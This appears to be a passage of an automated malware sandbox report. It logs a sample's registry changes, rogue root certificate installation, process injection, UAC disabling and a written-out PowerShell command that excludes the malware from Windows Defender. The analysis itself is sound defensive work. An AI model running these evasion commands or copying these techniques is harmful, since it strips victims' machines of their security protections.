Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-362 = "GTB Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-231 = "Hawaiian Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-772 = "Montevideo Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-392 = "Arab Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-731 = "Fiji Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-122 = "SA Pacific Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-335 = "Jordan Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-121 = "SA Pacific Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-391 = "Arab Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-1411 = "Syria Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-721 = "Central Pacific Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-582 = "North Asia East Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-981 = "Kamchatka Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-182 = "Mountain Standard Time (Mexico)" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-962 = "Paraguay Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-372 = "Jerusalem Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-912 = "Mauritius Standard Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-512 = "Central Asia Standard Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\@tzres.dll,-961 = "Paraguay Daylight Time" C:\Windows\windefender.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-441 = "Arabian Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Classes\Local Settings\MuiCache\2D\52C64B7E\C:\Windows\system32\,@tzres.dll,-211 = "Pacific Daylight Time" C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A

Modifies system certificate store

evasion spyware trojan
Description Indicator Process Target
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Windows\rss\csrss.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Set value (data) \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 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 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D4DE20D05E66FC53FE1A50882C78DB2852CAE474 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A
Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4 C:\Users\Admin\AppData\Local\Temp\csrss\patch.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A

Suspicious behavior: LoadsDriver

Description Indicator Process Target
N/A N/A N/A N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\rss\csrss.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\iolo\dm\SystemMechanic_5488CB36-BE62-4606-B07B-2EE938868BD1.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SysWOW64\sc.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2604 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 2128 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2716 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2796 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe
PID 2604 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\system32\WerFault.exe
PID 2604 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\system32\WerFault.exe
PID 2604 wrote to memory of 2640 N/A C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe C:\Windows\system32\WerFault.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2080 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 2308 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 948 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 2160 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\DgEQpmig2k2u8ahd5cM0IXOL.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2796 wrote to memory of 692 N/A C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Users\Admin\Pictures\yNIUqrzSFbniO7QgiDNi1e5u.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 840 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.0.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 2080 wrote to memory of 1608 N/A C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe C:\Users\Admin\AppData\Local\Temp\u1ls.1.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1728 wrote to memory of 1652 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\system32\cmd.exe
PID 1652 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1652 wrote to memory of 1236 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\netsh.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1728 wrote to memory of 2932 N/A C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe C:\Windows\rss\csrss.exe
PID 1784 wrote to memory of 1552 N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe C:\Windows\system32\cmd.exe
PID 1784 wrote to memory of 1552 N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe C:\Windows\system32\cmd.exe
PID 1784 wrote to memory of 1552 N/A C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe C:\Windows\system32\cmd.exe

System policy modification

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe N/A

Uses Task Scheduler COM API

persistence

Processes

C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe

"C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp\ca70a19b730b569ccdd5a903f7cbb98a0ac40a62a77b3d817b65c0f0c9a37620.exe" -Force

C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\installutil.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"

C:\Windows\system32\WerFault.exe

C:\Windows\system32\WerFault.exe -u -p 2604 -s 836

C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe

"C:\Users\Admin\Pictures\JvwmkpsShYOZx2FO997TqdmI.exe"

C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe

"C:\Users\Admin\Pictures\JziJRjwTPjmAIVQ7YR4wEkVF.exe"

C:\Users\Admin\Pictures\2U5ElIDy3tFD0tPHgA1ebjtp.exe

